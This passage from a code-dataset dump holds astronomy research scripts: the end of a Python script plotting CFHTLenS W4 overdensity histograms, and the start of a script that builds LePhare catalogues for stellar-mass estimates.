%.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=23\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(4,5,14)\nrangemax=6\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(4,5,14)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M^3}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 12\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=25\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nx = linspace(0,3,500)\n\n\ngauss_q_W4_50old = gaussian_kde(q_W4_50old)\n\ngauss_q_W4_75old = gaussian_kde(q_W4_75old)\n\ngauss_q_W4_50new = gaussian_kde(q_W4_50new)\n\ngauss_q_W4_75new = gaussian_kde(q_W4_75new)\n\nplt.subplot(4,5,16)\nrangemax=8\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(4,5,16)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75old[np.argmax(n_q_W4_75old)],np.average(q_W4_75old),np.median(q_W4_75old))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50new[np.argmax(n_q_W4_50new)],np.average(q_W4_50new),np.median(q_W4_50new))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\nplt.xlabel(r'${\\zeta_\\frac{M_{rms}^2}{r}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 13\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=27\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nx = linspace(0,3,500)\n\n\ngauss_q_W4_50old = gaussian_kde(q_W4_50old)\n\ngauss_q_W4_75old = gaussian_kde(q_W4_75old)\n\ngauss_q_W4_50new = gaussian_kde(q_W4_50new)\n\ngauss_q_W4_75new = gaussian_kde(q_W4_75new)\n\nplt.subplot(4,5,17)\nrangemax=8\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(4,5,17)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75old[np.argmax(n_q_W4_75old)],np.average(q_W4_75old),np.median(q_W4_75old))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50new[np.argmax(n_q_W4_50new)],np.average(q_W4_50new),np.median(q_W4_50new))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\nplt.xlabel(r'${\\zeta_\\frac{M_{rms}^3}{r}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 14\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=29\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(4,5,18)\nrangemax=7\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(4,5,18)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{zM}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 15\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=31\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(4,5,19)\nrangemax=10\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(4,5,19)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{zM^2}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6, direction='up')\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 16\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\nplt.legend(bbox_to_anchor=(1.5, 4), loc='center left', borderaxespad=0., fontsize=10)\n\n#plt.subplots_adjust(top=0.6)\n\nplt.tight_layout()\n\nplt.savefig('%s_overdensities_%s_size%s_i%s_oldnew.png' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), dpi=1000)\n\n#plt.show()\n\nos.system(\"rm fieldshistW4_50_%s_%s_size%s_i%s_new.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\nos.system(\"rm fieldshistW4_75_%s_%s_size%s_i%s_new.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])))\n\n\nif str(sys.argv[2]) == \"samp\":\n print(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.5214543342590332, "alphanum_fraction": 0.5469812750816345, "avg_line_length": 54.644859313964844, "blob_id": "56fd94fbf31459f4e8fd006d0a2719c0f84f64ee", "content_id": "888cdd1e5cf0dda26dda80b8c7258f8884856e01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11909, "license_type": "no_license", "max_line_length": 320, "num_lines": 214, "path": "/python/catalogue_utilities/mstarCFHTLENS.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# run from the lephare_dev/test folder as: python /Users/perseus/Dropbox/Davis_work/code/mstarCFHTLENS.py /Users/perseus/Dropbox/Davis_work/code/fieldstry.lst number\n# where number should be different for different processes run in the same time\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column\nimport time\n\nstart_timefield = time.time()\n\nwith open(str(sys.argv[1])) as fields: # fieldstry#.lst\n listfields = fields.readlines()\nlepharenr=10 # how many objects should lephare be run with\nu_CFHTLS=np.zeros(lepharenr)\nuerr_CFHTLS=np.zeros(lepharenr)\ng_CFHTLS=np.zeros(lepharenr)\ngerr_CFHTLS=np.zeros(lepharenr)\nr_CFHTLS=np.zeros(lepharenr)\nrerr_CFHTLS=np.zeros(lepharenr)\ni_CFHTLS=np.zeros(lepharenr)\nierr_CFHTLS=np.zeros(lepharenr)\ny_CFHTLS=np.zeros(lepharenr)\nyerr_CFHTLS=np.zeros(lepharenr)\nz_CFHTLS=np.zeros(lepharenr)\nzerr_CFHTLS=np.zeros(lepharenr)\npofz=np.zeros((lepharenr,70))\nmass_best=np.zeros((lepharenr,70))\nmass_inf=np.zeros((lepharenr,70))\nmass_med=np.zeros((lepharenr,70))\nmass_sup=np.zeros((lepharenr,70))\nchigal=np.zeros((lepharenr,70))\nchistar=np.zeros((lepharenr,70))\nz=np.linspace(0.05,3.5,70)\nfor count in range(len(listfields)):\n start_timesubfield = time.time()\n i=0 # object index in original catalogue\n itrue=0 # index of only the objects passing the selection criteria\n name=[]\n with open('%s.cat' % [x[0:len(listfields[0])-1] for x in listfields][count]) as orig:\n os.system(\"rm %s_mstar.cat\" % [x[0:len(listfields[0])-1] for x in listfields][count]) # since the code only appends, if we have an incomplete previous output we should remove it\n with open('%s_pdz.cat' % [x[0:len(listfields[0])-1] for x in listfields][count]) as pdz:\n linepdz=pdz.readlines()\n for lineorig in orig:\n if lineorig.split()[0]==\"#id\":\n check=\"false\"\n else:\n #print lineorig.split()[0], linepdz[i].split()[0], \"\\n\"\n if lineorig.split()[0] != linepdz[i].split()[0]:\n print \"Catalogue mismatch!\"\n break\n check=\"false\"\n if itrue==lepharenr:\n if i_CFHTLS[0]>0: # the code does not work properly for the < lepharenr objects with y but for which the .sh script considers the mag prior to be in i. Those need to be rerun separately. Actually this is not an issue since it appears that the CFHTLENS subfields do not contain mixed i and y mag objects. \n name_in=\"/Users/perseus/lephare_dev/test/izrgu_%s.cat\" % str(sys.argv[2])\n name_out=\"/Users/perseus/lephare_dev/test/izrgu_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\n else:\n name_in=\"/Users/perseus/lephare_dev/test/yzrgu_%s.cat\" % str(sys.argv[2])\n name_out=\"/Users/perseus/lephare_dev/test/yzrgu_%s.cat.MAG_BC03_I09.lephareout\" % str(sys.argv[2])\n lephare_in = open(name_in,'w')\n lephare_in.write(\"# \\t ID \\t u \\t u_err \\t g \\t g_err \\t r \\t r_err \\t i \\t i_err \\t y \\t y_err \\t z \\t z_err \\t context \\t z-spec \\t string \\n\")\n list=[]\n for k in range(lepharenr): #create list of lists\n list.append([])\n for k in range(lepharenr):\n for j in range(70):\n if pofz[k][j]>0.001:\n list[k].append(j)\n if i_CFHTLS[0]>0:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s 47 %s\\n' % (len(list[k]),u_CFHTLS[k],uerr_CFHTLS[k],g_CFHTLS[k],gerr_CFHTLS[k],r_CFHTLS[k],rerr_CFHTLS[k],i_CFHTLS[k],ierr_CFHTLS[k],y_CFHTLS[k],yerr_CFHTLS[k],z_CFHTLS[k],zerr_CFHTLS[k],z[j]))\n else:\n lephare_in.write('%s %s %s %s %s %s %s %s %s %s %s %s %s 55 %s\\n' % (len(list[k]),u_CFHTLS[k],uerr_CFHTLS[k],g_CFHTLS[k],gerr_CFHTLS[k],r_CFHTLS[k],rerr_CFHTLS[k],i_CFHTLS[k],ierr_CFHTLS[k],y_CFHTLS[k],yerr_CFHTLS[k],z_CFHTLS[k],zerr_CFHTLS[k],z[j]))\n lephare_in.close()\n os.system(\"/Users/perseus/lephare_dev/test/runlephare_phys_para_CFHTLS.sh %s\" % name_in)\n l=0\n with open('%s' % name_out) as lephare_out:\n lineout=lephare_out.readlines()\n for k in range(lepharenr):\n for j in range(len(list[k])):\n mass_best[k][list[k][j]]=float(lineout[62+l].split()[29])\n mass_inf[k][list[k][j]]=float(lineout[62+l].split()[30])\n mass_med[k][list[k][j]]=float(lineout[62+l].split()[31])\n mass_sup[k][list[k][j]]=float(lineout[62+l].split()[32])\n chigal[k][list[k][j]]=float(lineout[62+l].split()[5])\n chistar[k][list[k][j]]=float(lineout[62+l].split()[6])\n l=l+1\n outfile=open('%s_mstar.cat' % [x[0:len(listfields[0])-1] for x in listfields][count],'a')\n output=\"\"\n for k in range(lepharenr):\n output=output+name[k]+\"\\t\"\n for j in range(70):\n output=output+str(mass_best[k][j])+\"\\t\"+str(mass_inf[k][j])+\"\\t\"+str(mass_med[k][j])+\"\\t\"+str(mass_sup[k][j])+\"\\t\"+str(chigal[k][j])+\"\\t\"+str(chistar[k][j])+\"\\t\"\n output=output+\"\\n\"\n outfile.write(output)\n outfile.close()\n name=[]\n itrue=0\n mass_best=np.zeros((lepharenr,70))\n mass_inf=np.zeros((lepharenr,70))\n mass_med=np.zeros((lepharenr,70))\n mass_sup=np.zeros((lepharenr,70))\n chigal=np.zeros((lepharenr,70))\n chistar=np.zeros((lepharenr,70))\n #print lineorig.split()[60], \"\\n\"\n if (int(lineorig.split()[60]) == 0) and ((float(lineorig.split()[79]) <= 24 and float(lineorig.split()[79]) > 0) or (float(lineorig.split()[84]) <= 24 and float(lineorig.split()[84]) > 0)): #star_flag and mag_i, mag_y\n print \"------ running object number: \\t\", i, \"------\"\n name.append(lineorig.split()[0])\n u_CFHTLS[itrue]=float(lineorig.split()[64])\n uerr_CFHTLS[itrue]=float(lineorig.split()[65])\n g_CFHTLS[itrue]=float(lineorig.split()[69])\n gerr_CFHTLS[itrue]=float(lineorig.split()[70])\n r_CFHTLS[itrue]=float(lineorig.split()[74])\n 